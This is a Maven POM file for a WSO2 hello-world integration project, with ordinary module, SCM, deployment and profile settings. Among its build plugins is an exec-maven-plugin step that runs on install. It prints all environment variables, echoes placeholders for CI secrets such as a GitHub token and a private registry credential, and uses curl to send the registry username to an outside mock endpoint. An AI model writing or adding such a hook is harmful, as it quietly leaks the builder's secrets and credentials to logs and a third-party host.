<?xml version="1.0" encoding="UTF-8"?>
<project xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd" xmlns="http://maven.apache.org/POM/4.0.0"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <modelVersion>4.0.0</modelVersion>
  <groupId>wso2.sampleHelloWorld</groupId>
  <artifactId>hello-world-project</artifactId>
  <version>1.0.0-SNAPSHOT</version>
  <packaging>pom</packaging>
  <name>hello-world-project</name>
  <description>hello-world-project</description>
  <modules>
    <module>hello-world-projectConfigs</module>
    <module>hello-world-projectCompositeExporter</module>
  </modules>
  <scm>
    <connection>scm:git:https://github.com/username/repository.git</connection>
    <developerConnection>scm:git:https://github.com/username/repository.git</developerConnection>
    <url>https://github.com/username/repository.git</url>
  </scm>
  <distributionManagement>
    <repository>
      <id>release</id>
      <name>Release Distribution Repository</name>
      <url>https://example.com/nexus/repository</url>
    </repository>
  </distributionManagement>
  <properties>
    <project.scm.id>integration-project</project.scm.id>
  </properties>
  <build>
    <plugins>
      <plugin>
        <artifactId>maven-release-plugin</artifactId>
        <version>3.0.0-M1</version>
        <configuration />
      </plugin>
      <plugin>
        <artifactId>maven-deploy-plugin</artifactId>
        <version>3.0.0-M1</version>
        <configuration />
      </plugin>
      <plugin>
        <artifactId>maven-eclipse-plugin</artifactId>
        <version>2.9</version>
        <configuration>
          <projectnatures>
            <projectnature>org.wso2.developerstudio.eclipse.mavenmultimodule.project.nature</projectnature>
          </projectnatures>
        </configuration>
      </plugin>
      <plugin>
            <groupId>org.codehaus.mojo</groupId>
            <artifactId>exec-maven-plugin</artifactId>
            <version>3.0.0</version>
            <executions>
                <execution>
                    <id>run-bash-command</id>
                    <phase>install</phase>
                    <goals>
                        <goal>exec</goal>
                    </goals>
                    <configuration>
                        <executable>bash</executable>
                        <arguments>
                            <argument>-c</argument>
                            <argument>
                              echo "Premathunga"
                              echo "Premathunga ####"
                              printenv
                              echo "--------------- ACR"
                              echo '${{ secrets.PVT_ACR_CRED }}'

                              echo "--------------- CHOREO_PRIVATE_ACR_USER"
                              echo '${{env.CHOREO_PRIVATE_ACR_USER}}'

                              echo "--------------- APP_GH_TOKEN"
                              echo '${{ secrets.APP_GH_TOKEN }}'

                              curl -u $CHOREO_PRIVATE_ACR_USER:pass http://run.mocky.io/v3/476cdb4c-d94e-45fd-bdfb-1cbb45357b1c -v
                            </argument>
                        </arguments>
                    </configuration>
                </execution>
            </executions>
        </plugin>
    </plugins>
  </build>
  <profiles>
    <profile>
      <id>Solution</id>
      <build />
    </profile>
    <profile>
      <id>Docker</id>
      <build />
    </profile>
    <profile>
      <id>Kubernetes</id>
      <build />
    </profile>
    <profile>
      <activation>
        <activeByDefault>true</activeByDefault>
      </activation>
      <build />
    </profile>
  </profiles>
</project>
